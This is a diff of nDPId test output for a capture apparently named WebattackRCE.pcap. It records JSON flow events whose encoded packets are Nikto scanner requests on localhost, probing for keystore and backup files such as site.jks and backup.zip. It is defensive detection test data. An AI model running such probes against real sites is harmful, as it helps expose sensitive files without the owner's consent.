-01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276973,"flow_last_seen":1576420276973,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276973,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49934,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276973,"flow_last_seen":1576420276973,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276973,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49934,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276976,"flow_last_seen":1576420276976,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1576420276976,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276976,"pkt":"AAAAAAAAAAAAAAAACABFAADABYdAAEAGNq9\/AAABfwAAAcMQH5AThT3a7QA3zYAYAED+tAAAAQEICp1m\/BidZvwYR0VUIC9zaXRlLmprcyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276976,"flow_last_seen":1576420276976,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49936,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276976,"flow_last_seen":1576420276976,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49936,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276977,"flow_last_seen":1576420276977,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1576420276977,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276977,"pkt":"AAAAAAAAAAAAAAAACABFAADBYiVAAEAG2g9\/AAABfwAAAcMSH5B68lqAEiH3Y4AYAED+tQAAAQEICp1m\/BmdZvwZR0VUIC8xMjcuMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276977,"flow_last_seen":1576420276977,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49938,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276977,"flow_last_seen":1576420276977,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49938,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276980,"flow_last_seen":1576420276980,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1576420276980,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276980,"pkt":"AAAAAAAAAAAAAAAACABFAADBB+JAAEAGNFN\/AAABfwAAAcMUH5Dk6j++IkHQl4AYAED+tQAAAQEICp1m\/BydZvwcR0VUIC8xMjcuMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276980,"flow_last_seen":1576420276980,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49940,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276980,"flow_last_seen":1576420276980,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49940,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276982,"flow_last_seen":1576420276982,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276982,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1576420276982,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276982,"pkt":"AAAAAAAAAAAAAAAACABFAAC98llAAEAGSd9\/AAABfwAAAcMWH5DjKcoLls+qsoAYAED+sQAAAQEICp1m\/B6dZvwdR0VUIC8xLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276982,"flow_last_seen":1576420276982,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276982,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49942,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276982,"flow_last_seen":1576420276982,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276982,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49942,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276983,"flow_last_seen":1576420276983,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1576420276983,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276983,"pkt":"AAAAAAAAAAAAAAAACABFAAC9nNlAAEAGn19\/AAABfwAAAcMYH5CM06SLK3vm\/IAYAED+sQAAAQEICp1m\/B+dZvwfR0VUIC8xLmFseiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276983,"flow_last_seen":1576420276983,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49944,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276983,"flow_last_seen":1576420276983,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49944,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276985,"flow_last_seen":1576420276985,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276985,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1576420276985,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276985,"pkt":"AAAAAAAAAAAAAAAACABFAADCh5hAAEAGtJt\/AAABfwAAAcMaH5DK+b\/J7Nxpa4AYAED+tgAAAQEICp1m\/CGdZvwgR0VUIC9iYWNrdXAuemlwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276985,"flow_last_seen":1576420276985,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276985,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49946,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276985,"flow_last_seen":1576420276985,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276985,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49946,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276986,"flow_last_seen":1576420276986,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1576420276986,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276986,"pkt":"AAAAAAAAAAAAAAAACABFAADC6rNAAEAGUYB\/AAABfwAAAcMcH5BJJNLw4gK1PYAYAED+tgAAAQEICp1m\/CKdZvwiR0VUIC9iYWNrdXAuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276986,"flow_last_seen":1576420276986,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49948,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276986,"flow_last_seen":1576420276986,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49948,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276987,"flow_last_seen":1576420276987,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276987,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 